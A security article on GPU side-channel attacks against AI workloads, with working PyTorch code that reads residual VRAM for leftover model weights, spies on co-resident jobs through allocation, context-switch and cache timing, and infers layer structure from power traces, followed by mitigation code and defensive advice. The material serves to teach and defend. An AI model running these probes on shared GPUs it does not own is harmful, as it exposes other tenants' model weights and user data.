GPU Memory Side-Channel Attacks
Side-channel attacks that exploit GPU memory allocation, timing, and electromagnetic emanation to extract sensitive data from AI workloads.
Overview
GPUs are designed for parallel computation, not for multi-tenant security isolation. Unlike CPUs, which have benefited from decades of refinement in memory protection (virtual memory, page tables, protection rings), GPU memory management is comparatively simple. NVIDIA GPUs use a unified VRAM pool managed by the CUDA driver, and the isolation guarantees depend on the sharing mode (exclusive, time-sliced, MPS, or MIG).
This creates side-channel opportunities that have no direct counterpart on CPUs, or that CPUs have long since mitigated. When GPU memory is allocated and freed, the data can remain in VRAM until it is overwritten. When multiple workloads share a GPU, timing differences in memory operations leak information about the other workloads. Even physical side channels (power consumption and electromagnetic emanation) carry information about the computations running on the GPU.
These side channels matter directly for AI security because AI workloads process sensitive data: model weights (intellectual property), inference inputs (user data, business queries), and training data (which may contain PII, medical records, or financial data). This article covers the known classes of GPU side-channel attack, provides practical demonstration code, and evaluates the effectiveness of the available mitigations.
The attacks described here draw on research including Naghibijouybari et al., "Rendered Insecure: GPU Side Channel Attacks are Practical" (ACM CCS 2018), and Wei et al., "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020).
GPU memory architecture
VRAM management
NVIDIA GPUs manage VRAM through the CUDA driver, which allocates memory in blocks. Unlike CPU virtual memory, where the operating system zeroes pages before handing them to a process, GPU memory allocation is not guaranteed to be zero-initialized in every context. The CUDA runtime's cudaMalloc does not guarantee that allocated memory is cleared, which means newly allocated buffers may contain data from earlier allocations.
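The mechanism can be illustrated without a GPU. The following is a toy model, not the CUDA driver's actual allocator: `ToyVRAM` and its methods are hypothetical names, and the first-fit reuse policy is an assumption chosen for simplicity. It shows only why skipping the clear step lets a later tenant read an earlier tenant's bytes.

```python
from typing import Dict, List, Tuple


class ToyVRAM:
    """Toy memory pool that reuses freed regions (hypothetical, for illustration)."""

    def __init__(self, size: int, scrub_on_free: bool = False):
        self.memory = bytearray(size)             # backing store, starts zeroed
        self.scrub_on_free = scrub_on_free        # whether free() clears the region
        self.live: Dict[int, int] = {}            # offset -> region length
        self.free_list: List[Tuple[int, int]] = []
        self.next_unused = 0                      # bump pointer for fresh memory

    def malloc(self, length: int) -> int:
        # First fit: hand out a previously freed region if it is large enough
        for idx, (offset, region_len) in enumerate(self.free_list):
            if region_len >= length:
                self.free_list.pop(idx)
                self.live[offset] = region_len
                return offset
        if self.next_unused + length > len(self.memory):
            raise MemoryError("toy pool exhausted")
        offset = self.next_unused
        self.next_unused += length
        self.live[offset] = length
        return offset

    def free(self, offset: int) -> None:
        length = self.live.pop(offset)
        if self.scrub_on_free:
            self.memory[offset:offset + length] = bytes(length)
        self.free_list.append((offset, length))

    def write(self, offset: int, data: bytes) -> None:
        self.memory[offset:offset + len(data)] = data

    def read(self, offset: int, length: int) -> bytes:
        return bytes(self.memory[offset:offset + length])


def demo(scrub_on_free: bool) -> bytes:
    """Victim writes and frees; attacker allocates the same size and reads."""
    vram = ToyVRAM(size=64, scrub_on_free=scrub_on_free)
    victim = vram.malloc(16)
    vram.write(victim, b"secret-weights!!")
    vram.free(victim)
    attacker = vram.malloc(16)  # first fit lands on the victim's old region
    return vram.read(attacker, 16)


print(demo(scrub_on_free=False))  # attacker sees the victim's bytes
print(demo(scrub_on_free=True))   # attacker sees only zeros
```

The PyTorch scanner that follows probes for the same effect on a real device.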
import math
from typing import Dict, List

import torch


class GPUMemoryResidualScanner:
    """
    Scan GPU memory for residual data from previous workloads.
    Demonstrates the GPU memory residual side channel.
    """

    def __init__(self, device: str = "cuda:0"):
        if not torch.cuda.is_available():
            raise RuntimeError("CUDA is not available")
        self.device = torch.device(device)

    def allocate_and_scan(
        self,
        size_mb: int = 256,
        num_blocks: int = 10,
    ) -> List[Dict]:
        """
        Allocate GPU memory blocks and check for non-zero residual data.
        This demonstrates that GPU memory may contain data from previous
        allocations by other processes on the same GPU.
        """
        findings = []
        num_elements = (size_mb * 1024 * 1024) // 4  # float32 = 4 bytes
        for i in range(num_blocks):
            try:
                # Use empty (not zeros) to avoid initialization
                tensor = torch.empty(num_elements, dtype=torch.float32, device=self.device)
                # Check for non-zero values (residual data)
                non_zero_count = torch.count_nonzero(tensor).item()
                if non_zero_count > 0:
                    # Summarize the residual values
                    non_zero_values = tensor[tensor != 0]
                    findings.append({
                        "block": i,
                        "size_mb": size_mb,
                        "non_zero_count": non_zero_count,
                        "non_zero_ratio": non_zero_count / num_elements,
                        "sample_values": non_zero_values[:10].cpu().tolist(),
                        "min_value": non_zero_values.min().item(),
                        "max_value": non_zero_values.max().item(),
                        "finding": "RESIDUAL_DATA_FOUND",
                    })
                    del non_zero_values
                else:
                    findings.append({
                        "block": i,
                        "size_mb": size_mb,
                        "non_zero_count": 0,
                        "finding": "CLEAN",
                    })
                del tensor
                # Return cached blocks to the driver before the next allocation
                torch.cuda.empty_cache()
            except torch.cuda.OutOfMemoryError:
                findings.append({
                    "block": i,
                    "finding": "OOM: could not allocate",
                })
        return findings

    def scan_for_model_weights(self, size_mb: int = 512) -> Dict:
        """
        Attempt to detect residual model weight patterns in GPU memory.
        Model weights typically follow specific statistical distributions
        (approximately normal for transformer layers).
        """
        num_elements = (size_mb * 1024 * 1024) // 4
        tensor = torch.empty(num_elements, dtype=torch.float32, device=self.device)
        # Raw residual bits can decode to NaN or inf, which would poison the
        # statistics below, so keep only finite non-zero values
        values = tensor[torch.isfinite(tensor) & (tensor != 0)]
        del tensor
        if values.numel() < 2:
            torch.cuda.empty_cache()
            return {"found": False, "detail": "No residual data"}
        mean = values.mean().item()
        std = values.std().item()
        if std == 0 or not math.isfinite(std):
            torch.cuda.empty_cache()
            return {"found": False, "detail": "Residual data has no usable spread"}
        # Excess kurtosis (0 for a normal distribution)
        kurtosis_val = ((values - mean) ** 4).mean().item() / (std ** 4) - 3
        sample_size = values.numel()
        # Heuristic check: does the distribution look like model weights?
        looks_like_weights = (
            abs(mean) < 0.5  # Weights are typically near zero
            and 0.001 < std < 1.0  # Reasonable weight scale
            and abs(kurtosis_val) < 10  # Not too heavy-tailed
        )
        del values
        torch.cuda.empty_cache()
        return {
            "found": looks_like_weights,
            "statistics": {
                "mean": mean,
                "std": std,
                "kurtosis": kurtosis_val,
                "sample_size": sample_size,
            },
            "interpretation": (
                "Residual data matches typical model weight distribution"
                if looks_like_weights
                else "Residual data does not match weight patterns"
            ),
        }

Memory allocation timing
The time needed to allocate GPU memory depends on the current memory state, which is influenced by other workloads. By measuring allocation timing, an attacker can infer information about co-resident workloads:
import statistics
import time
from typing import Dict, List, Optional, Tuple

import torch


class GPUTimingSideChannel:
    """
    Demonstrate GPU memory timing side channels.
    Allocation and computation timing varies based on co-resident workloads.
    """

    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)

    def measure_allocation_timing(
        self,
        sizes_mb: Optional[List[int]] = None,
        num_samples: int = 100,
    ) -> List[Dict]:
        """
        Measure GPU memory allocation timing at various sizes.
        Timing variations can reveal co-resident workload activity.
        """
        if sizes_mb is None:
            sizes_mb = [1, 10, 50, 100, 500]
        results = []
        for size_mb in sizes_mb:
            num_elements = (size_mb * 1024 * 1024) // 4
            timings = []
            for _ in range(num_samples):
                torch.cuda.synchronize()
                start = time.perf_counter_ns()
                try:
                    t = torch.empty(num_elements, dtype=torch.float32, device=self.device)
                except torch.cuda.OutOfMemoryError:
                    break
                torch.cuda.synchronize()
                timings.append(time.perf_counter_ns() - start)
                del t
                # Release the block so the next sample triggers a real
                # allocation instead of a hit in PyTorch's caching allocator
                torch.cuda.empty_cache()
            if timings:
                results.append({
                    "size_mb": size_mb,
                    "mean_ns": statistics.fmean(timings),
                    "min_ns": min(timings),
                    "max_ns": max(timings),
                    "std_ns": statistics.pstdev(timings),
                    "samples": len(timings),
                })
        return results

    def measure_inference_timing(
        self,
        model: torch.nn.Module,
        input_sizes: List[Tuple[int, ...]],
        num_samples: int = 50,
    ) -> List[Dict]:
        """
        Measure inference timing across different input sizes.
        Timing reveals information about model architecture.
        """
        model.eval()
        results = []
        with torch.no_grad():
            for input_size in input_sizes:
                # Warm up once per input shape so one-time setup cost
                # does not end up in the measurements
                _ = model(torch.randn(*input_size, device=self.device))
                timings = []
                for _ in range(num_samples):
                    x = torch.randn(*input_size, device=self.device)
                    torch.cuda.synchronize()
                    start = time.perf_counter_ns()
                    _ = model(x)
                    torch.cuda.synchronize()
                    timings.append(time.perf_counter_ns() - start)
                    del x
                results.append({
                    "input_size": input_size,
                    "mean_us": statistics.fmean(timings) / 1000,
                    "std_us": statistics.pstdev(timings) / 1000,
                    "samples": len(timings),
                })
        return results

Context-switching side channels
Time-sliced GPU sharing
When multiple processes share a GPU through time-slicing (the default on consumer GPUs and many cloud instances), the GPU switches context between processes. Each context switch causes measurable performance interference.
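One way a spy process might separate context-switch spikes from ordinary jitter is a robust outlier test. The sketch below is an illustration, not the method from the cited papers: the function name `find_latency_spikes` and the cutoff `k = 5` are assumptions, and the trace is synthetic. It uses the median and the median absolute deviation (MAD) because a mean-based threshold is itself pulled upward by the spikes it is trying to find.

```python
import statistics
from typing import List


def find_latency_spikes(durations_ns: List[float], k: float = 5.0) -> List[int]:
    """Return indices of samples more than k scaled MADs above the median."""
    if len(durations_ns) < 3:
        return []
    median = statistics.median(durations_ns)
    mad = statistics.median([abs(d - median) for d in durations_ns])
    # 1.4826 makes the MAD comparable to a standard deviation for normal data
    scale = 1.4826 * mad
    if scale == 0:
        # At least half the samples equal the median: anything above it stands out
        return [i for i, d in enumerate(durations_ns) if d > median]
    threshold = median + k * scale
    return [i for i, d in enumerate(durations_ns) if d > threshold]


# Synthetic probe trace: ~100 us baseline with small jitter,
# plus a 400 us spike on every tenth probe (hypothetical numbers)
trace = [100_000 + (i % 7) * 500 for i in range(50)]
for i in range(9, 50, 10):
    trace[i] = 400_000

print(find_latency_spikes(trace))
```

On real hardware the baseline drifts with clock frequency and temperature, so a sliding window over recent probes would likely be needed rather than one global median.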
In "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020), Wei et al. showed that an attacker who runs a spy process that monitors its own performance during context switches can infer the following:
- Whether a neural network is running on the shared GPU
- The model architecture (number of layers, layer types)
- Properties of the input data (image dimensions, batch size)
import statistics
import time
from typing import Dict, List

import torch


class ContextSwitchSpy:
    """
    Monitor GPU context switching to infer co-resident workload properties.
    Based on concepts from Wei et al. (IEEE DSN 2020).
    """

    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)

    def run_spy_kernel(
        self,
        duration_seconds: float = 5.0,
        probe_size: int = 1024,
    ) -> Dict:
        """
        Run a continuous probe kernel and measure timing variations.
        Timing spikes indicate GPU context switches to other workloads.
        The raw samples are returned under "measurements" so they can be
        passed to infer_layer_structure.
        """
        probe = torch.randn(probe_size, probe_size, device=self.device)
        measurements = []
        start_time = time.perf_counter()
        while time.perf_counter() - start_time < duration_seconds:
            torch.cuda.synchronize()
            op_start = time.perf_counter_ns()
            # Simple matrix multiply as timing probe
            result = torch.mm(probe, probe)
            torch.cuda.synchronize()
            elapsed_ns = time.perf_counter_ns() - op_start
            measurements.append({
                "timestamp_ns": op_start,
                "duration_ns": elapsed_ns,
            })
            del result
        if not measurements:
            return {
                "total_probes": 0,
                "measurements": [],
                "interpretation": "No probes completed",
            }
        # Analyze timing variations
        durations = [m["duration_ns"] for m in measurements]
        mean_duration = statistics.fmean(durations)
        # Heuristic: treat a >2x slowdown as a context switch
        threshold = mean_duration * 2
        context_switches = [
            m for m in measurements if m["duration_ns"] > threshold
        ]
        return {
            "total_probes": len(measurements),
            "mean_duration_ns": mean_duration,
            "context_switches_detected": len(context_switches),
            "switch_ratio": len(context_switches) / len(measurements),
            "measurements": measurements,
            "interpretation": (
                "Co-resident GPU workload detected"
                if len(context_switches) > len(measurements) * 0.05
                else "No significant co-resident activity detected"
            ),
        }

    def infer_layer_structure(
        self,
        measurements: List[Dict],
        expected_layer_duration_us: float = 100,  # Not used by this heuristic
    ) -> Dict:
        """
        Attempt to infer neural network layer structure from timing patterns.
        Different layer types (conv, attention, linear) have characteristic timing signatures.
        """
        if len(measurements) < 2:
            return {"inference_possible": False, "reason": "Insufficient anomaly data"}
        durations = [m["duration_ns"] for m in measurements]
        mean_d = statistics.fmean(durations)
        # Indices of probes that ran noticeably slower than average
        anomalies = [i for i, d in enumerate(durations) if d > mean_d * 1.5]
        if len(anomalies) < 2:
            return {"inference_possible": False, "reason": "Insufficient anomaly data"}
        # Intervals (in probe counts) between consecutive anomalies
        intervals = [b - a for a, b in zip(anomalies, anomalies[1:])]
        mean_interval = statistics.fmean(intervals)
        interval_std = statistics.pstdev(intervals)
        # A low relative spread suggests periodicity (repeated layer execution)
        periodic = interval_std / mean_interval < 0.3
        return {
            "inference_possible": True,
            "anomaly_count": len(anomalies),
            "mean_interval": mean_interval,
            "periodic": periodic,
            "estimated_layers": len(anomalies) if periodic else "unknown",
            "interpretation": (
                f"Detected periodic pattern suggesting ~{len(anomalies)} layer executions"
                if periodic
                else "Detected activity but could not determine layer structure"
            ),
        }

Cache-based side channels
GPU cache contention
Modern GPUs have L1 and L2 caches. In shared GPU environments, cache contention between workloads creates observable timing differences:
import statistics
import time
from typing import Dict

import torch


class GPUCacheSideChannel:
    """
    Demonstrate GPU cache-based side channels.
    Cache contention from co-resident workloads causes measurable timing variations.
    """

    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)

    def prime_and_probe(
        self,
        array_size: int = 4 * 1024 * 1024,  # 4M elements ~= 16MB at float32
        num_rounds: int = 100,
    ) -> Dict:
        """
        GPU adaptation of Prime+Probe cache side channel.
        1. Prime: Fill GPU cache with known data
        2. Wait: Allow victim to execute (displacing some cache lines)
        3. Probe: Measure access time to our cached data
        Cache lines displaced by the victim will be slower to access.
        Host-side timing also includes kernel launch and synchronization
        overhead, so this is a coarse signal only.
        """
        # Create a large array that fills the L2 cache
        probe_array = torch.randn(array_size, dtype=torch.float32, device=self.device)
        access_pattern = torch.randperm(array_size, device=self.device)[:1024]
        baseline_times = []
        probe_times = []
        for _ in range(num_rounds):
            # PRIME: Access all elements to fill cache
            torch.cuda.synchronize()
            _ = probe_array.sum()
            torch.cuda.synchronize()
            # PROBE (baseline: no deliberate gap between prime and probe)
            start = time.perf_counter_ns()
            _ = probe_array[access_pattern].sum()
            torch.cuda.synchronize()
            baseline_times.append(time.perf_counter_ns() - start)
            # PRIME again
            _ = probe_array.sum()
            torch.cuda.synchronize()
            # Small delay to allow potential co-resident activity
            time.sleep(0.001)
            # PROBE again (after potential victim activity)
            start = time.perf_counter_ns()
            _ = probe_array[access_pattern].sum()
            torch.cuda.synchronize()
            probe_times.append(time.perf_counter_ns() - start)
        mean_baseline = statistics.fmean(baseline_times)
        mean_probe = statistics.fmean(probe_times)
        return {
            "rounds": num_rounds,
            "mean_baseline_ns": mean_baseline,
            "mean_probe_ns": mean_probe,
            "timing_difference_ns": mean_probe - mean_baseline,
            "cache_contention_detected": mean_probe > mean_baseline * 1.2,
            "contention_ratio": mean_probe / mean_baseline if mean_baseline > 0 else 0,
        }

Power and electromagnetic side channels
GPU power consumption correlates with computational activity. Research has shown that power traces can reveal:
- Whether the GPU is performing matrix multiplication (training/inference) or memory operations
- The size of the matrices being computed
- Possibly the values being processed (in extreme cases, with high-resolution measurements)
These attacks require physical access to power measurement points or electromagnetic probes near the GPU, which makes them most relevant for:
- Shared physical infrastructure (colocation data centers)
- Edge AI devices to which an attacker has physical access
- Supply-chain attacks in which monitoring hardware has been implanted
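The resolution of the measurement decides how much structure survives in a trace. The following sketch uses a synthetic square-wave power signal, not real measurements: the 300 W and 100 W levels, the 500 µs phase length, and the helper names are all assumptions chosen for illustration. It counts how many active/idle transitions remain visible at two sampling intervals.

```python
from typing import List


def synthetic_power(t_us: int, phase_us: int = 500) -> float:
    """Square wave alternating between 300 W (active) and 100 W (idle)."""
    return 300.0 if (t_us // phase_us) % 2 == 0 else 100.0


def sample_trace(duration_us: int, interval_us: int) -> List[float]:
    """Sample the synthetic signal every interval_us microseconds."""
    return [synthetic_power(t) for t in range(0, duration_us, interval_us)]


def count_transitions(trace: List[float], threshold_w: float = 200.0) -> int:
    """Count how often consecutive samples fall on different sides of the threshold."""
    states = [p > threshold_w for p in trace]
    return sum(1 for a, b in zip(states, states[1:]) if a != b)


duration_us = 1_000_000  # one second of simulated activity
fine = count_transitions(sample_trace(duration_us, 50))          # 50 us probe
coarse = count_transitions(sample_trace(duration_us, 100_000))   # 100 ms polling

print(f"transitions seen at 50 us sampling:  {fine}")
print(f"transitions seen at 100 ms sampling: {coarse}")
```

In this synthetic case the 100 ms trace aliases to a flat line while the 50 µs trace keeps every phase boundary, which is consistent with the point above that fine-grained inference calls for high-resolution physical probes.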
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class PowerMeasurement:
    """Simulated GPU power measurement data point."""
    timestamp_us: float
    power_watts: float
    gpu_utilization_pct: float


class PowerSideChannelAnalyzer:
    """
    Analyze GPU power consumption traces for information leakage.
    In practice, power measurements come from:
    - nvidia-smi (low resolution, ~1 second)
    - NVML API (higher resolution, ~100ms)
    - External power meters (highest resolution)
    """

    def analyze_power_trace(
        self,
        measurements: List[PowerMeasurement],
    ) -> Dict:
        """Analyze a power consumption trace for patterns."""
        if not measurements:
            return {"analysis": "no_data"}
        powers = [m.power_watts for m in measurements]
        timestamps = [m.timestamp_us for m in measurements]
        mean_power = sum(powers) / len(powers)
        # Heuristic: samples below 80% of the mean count as idle
        idle_threshold = mean_power * 0.8

        def classify(power: float) -> str:
            return "idle" if power < idle_threshold else "active"

        def make_phase(kind: str, start: int, end: int) -> Dict:
            # end is exclusive; the final phase ends at the last sample
            end_ts = timestamps[min(end, len(timestamps) - 1)]
            return {
                "type": kind,
                "start_idx": start,
                "end_idx": end,
                "duration_us": end_ts - timestamps[start],
                "mean_power": sum(powers[start:end]) / (end - start),
            }

        # Detect computation phases
        phases = []
        current_phase = classify(powers[0])
        phase_start = 0
        for i in range(1, len(powers)):
            new_phase = classify(powers[i])
            if new_phase != current_phase:
                phases.append(make_phase(current_phase, phase_start, i))
                current_phase = new_phase
                phase_start = i
        # Close the final phase, which the loop above never emits
        phases.append(make_phase(current_phase, phase_start, len(powers)))
        active_phases = [p for p in phases if p["type"] == "active"]
        return {
            "total_measurements": len(measurements),
            "mean_power_watts": mean_power,
            "max_power_watts": max(powers),
            "min_power_watts": min(powers),
            "computation_phases": len(active_phases),
            "phase_details": active_phases[:10],
            "interpretation": (
                f"Detected {len(active_phases)} computation phases; "
                "may correspond to model layers or inference batches"
            ),
        }

    def detect_model_architecture_from_power(
        self, phases: List[Dict]
    ) -> Dict:
        """
        Attempt to infer model architecture from power consumption patterns.
        Different layer types have characteristic power signatures.
        The wattage and duration cutoffs below are illustrative heuristics.
        """
        if len(phases) < 3:
            return {"inference_possible": False}
        # Attention layers: high power, longer duration
        # Linear layers: moderate power, shorter duration
        # Normalization: low power, very short duration
        layer_classifications = []
        for phase in phases:
            power = phase.get("mean_power", 0)
            duration = phase.get("duration_us", 0)
            if power > 250 and duration > 1000:
                layer_classifications.append("attention_or_matmul")
            elif power > 150 and duration > 500:
                layer_classifications.append("linear")
            elif duration < 200:
                layer_classifications.append("normalization_or_activation")
            else:
                layer_classifications.append("unknown")
        return {
            "inference_possible": True,
            "estimated_layers": len(layer_classifications),
            "layer_types": layer_classifications,
            "attention_layers": layer_classifications.count("attention_or_matmul"),
            "linear_layers": layer_classifications.count("linear"),
        }

Mitigations
Software mitigations
import random
import time

import torch


class GPUSideChannelMitigation:
    """Software mitigations for GPU side-channel attacks."""

    @staticmethod
    def secure_allocate(
        size: tuple,
        dtype: torch.dtype = torch.float32,
        device: str = "cuda:0",
    ) -> torch.Tensor:
        """Allocate GPU memory and zero-initialize it to prevent residual data leakage."""
        return torch.zeros(size, dtype=dtype, device=torch.device(device))

    @staticmethod
    def secure_deallocate(tensor: torch.Tensor) -> None:
        """
        Overwrite a tensor with zeros before it is freed.
        The caller must also drop its own references to the tensor;
        the del below only removes this function's local name.
        """
        if tensor.is_cuda:
            tensor.zero_()
            torch.cuda.synchronize()
        del tensor
        torch.cuda.empty_cache()

    @staticmethod
    def add_timing_noise(
        min_delay_ms: float = 0.1,
        max_delay_ms: float = 1.0,
    ) -> None:
        """
        Add random timing noise to inference operations.
        Makes timing side channels less reliable.
        """
        delay = random.uniform(min_delay_ms, max_delay_ms) / 1000
        time.sleep(delay)

    @staticmethod
    def constant_time_inference(
        model: torch.nn.Module,
        input_tensor: torch.Tensor,
        fixed_duration_ms: float = 100,
    ) -> torch.Tensor:
        """
        Execute inference and pad to a fixed duration.
        Reduces timing leakage by making inferences take the same wall-clock
        time, provided the inference itself finishes within fixed_duration_ms.
        """
        start = time.perf_counter()
        with torch.no_grad():
            output = model(input_tensor)
        torch.cuda.synchronize()
        elapsed_ms = (time.perf_counter() - start) * 1000
        remaining_ms = fixed_duration_ms - elapsed_ms
        if remaining_ms > 0:
            time.sleep(remaining_ms / 1000)
        return output

Hardware mitigations
| Mitigation | Effectiveness | Performance impact | Availability |
|---|---|---|---|
| MIG (Multi-Instance GPU) | High: hardware isolation | Less compute per instance | MIG-capable data center GPUs (for example A100, H100) |
| NVIDIA Confidential Computing | Very high: GPU memory isolated in a hardware TEE, CPU-GPU transfers encrypted | 5-15% overhead (workload dependent) | H100 |
| GPU memory scrubbing | Medium: removes residual data | Adds allocation latency | Configurable in software |
| Dedicated GPU per workload | Complete against co-tenant channels: no sharing | None (higher hardware cost) | Any GPU |
| IOMMU | Medium: prevents DMA attacks | Minimal | Depends on CPU/chipset |
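Which of these sharing modes a host is actually running can be checked with `nvidia-smi`. The sketch below is one possible audit helper, not an official tool: `parse_gpu_modes` and `query_gpu_modes` are hypothetical names, the `needs_review` rule is a simplifying heuristic, and the code assumes the installed `nvidia-smi` supports the `mig.mode.current` and `compute_mode` query fields and prints one CSV row per GPU.

```python
import subprocess
from typing import Dict, List

QUERY_FIELDS = "index,mig.mode.current,compute_mode"


def parse_gpu_modes(csv_text: str) -> List[Dict[str, object]]:
    """Parse 'index, mig mode, compute mode' rows into dictionaries."""
    rows: List[Dict[str, object]] = []
    for line in csv_text.strip().splitlines():
        fields = [f.strip() for f in line.split(",")]
        if len(fields) != 3:
            continue  # skip anything that is not a three-column row
        index, mig_mode, compute_mode = fields
        mig_enabled = mig_mode == "Enabled"
        # "Default" compute mode lets several processes create contexts
        # on the same GPU, which is the precondition for time-slicing
        allows_multiple_processes = compute_mode == "Default"
        rows.append({
            "index": index,
            "mig_enabled": mig_enabled,
            "compute_mode": compute_mode,
            # Heuristic only: flag GPUs that can be shared without MIG
            "needs_review": allows_multiple_processes and not mig_enabled,
        })
    return rows


def query_gpu_modes() -> List[Dict[str, object]]:
    """Run nvidia-smi and parse its output (requires an NVIDIA driver)."""
    completed = subprocess.run(
        ["nvidia-smi", f"--query-gpu={QUERY_FIELDS}", "--format=csv,noheader"],
        capture_output=True,
        text=True,
        check=True,
    )
    return parse_gpu_modes(completed.stdout)


# Example with captured-style output (made-up values for three GPUs)
sample_output = "0, Enabled, Default\n1, [N/A], Default\n2, Disabled, Exclusive_Process\n"
for row in parse_gpu_modes(sample_output):
    print(row)
```

A flagged GPU is not necessarily misconfigured; the flag only means that nothing at the driver level prevents a second tenant from sharing it.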
Defensive recommendations
- Use MIG in multi-tenant GPU environments to get hardware-enforced memory isolation
- Zero-initialize GPU memory on allocation to prevent residual data leakage
- Overwrite GPU memory with zeros before freeing sensitive tensors
- Use NVIDIA Confidential Computing (H100) for sensitive inference workloads
- Avoid GPU time-slicing for security-sensitive workloads; use dedicated GPUs or MIG instances instead
- Add timing noise or fixed-duration padding to inference operations to make timing side channels less reliable
- Monitor GPU power consumption for anomalous patterns that may indicate a side-channel attack
- Enable the IOMMU to prevent DMA-based memory access from compromised GPU workloads
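Random delay on its own tends to be a weak defense, because independent noise averages out when an attacker can repeat the measurement. The simulation below illustrates this with made-up latencies (10 ms and 11 ms for two hypothetical inputs) and contrasts it with padding each response up to a fixed bucket boundary. `pad_to_bucket`, `observed_mean`, and the 20 ms bucket are illustrative assumptions, not recommended values.

```python
import math
import random
import statistics


def pad_to_bucket(elapsed_ms: float, bucket_ms: float = 20.0) -> float:
    """Round a latency up to the next multiple of bucket_ms (at least one bucket)."""
    return max(1, math.ceil(elapsed_ms / bucket_ms)) * bucket_ms


def observed_mean(true_ms: float, defense: str, n: int, rng: random.Random) -> float:
    """Mean latency an attacker observes over n repeated queries."""
    samples = []
    for _ in range(n):
        if defense == "noise":
            # Random delay of 0.1 to 1.0 ms added to the true latency
            samples.append(true_ms + rng.uniform(0.1, 1.0))
        else:
            # Response is held until the next bucket boundary
            samples.append(pad_to_bucket(true_ms))
    return statistics.fmean(samples)


rng = random.Random(0)  # fixed seed so the run is repeatable
noise_gap = observed_mean(11.0, "noise", 2000, rng) - observed_mean(10.0, "noise", 2000, rng)
bucket_gap = observed_mean(11.0, "bucket", 2000, rng) - observed_mean(10.0, "bucket", 2000, rng)

print(f"gap visible through random noise:  {noise_gap:.3f} ms")
print(f"gap visible through bucket padding: {bucket_gap:.3f} ms")
```

Bucketing hides only the differences that fall within one bucket, and it costs latency; inputs whose latencies straddle a bucket boundary remain distinguishable.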
References
- Naghibijouybari et al., "Rendered Insecure: GPU Side Channel Attacks are Practical" (ACM CCS 2018): foundational GPU side-channel research
- Wei et al., "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020): model architecture inference from context switching
- Zhu et al., "Hermes Attack: Steal DNN Models with Lossless Inference Accuracy" (USENIX Security 2021): model extraction by observing PCIe traffic between host and GPU
- NVIDIA Multi-Instance GPU: https://docs.nvidia.com/datacenter/tesla/mig-user-guide/
- NVIDIA Confidential Computing: https://developer.nvidia.com/confidential-computing
- MITRE ATLAS: AML.T0024 (Exfiltration via ML Inference API)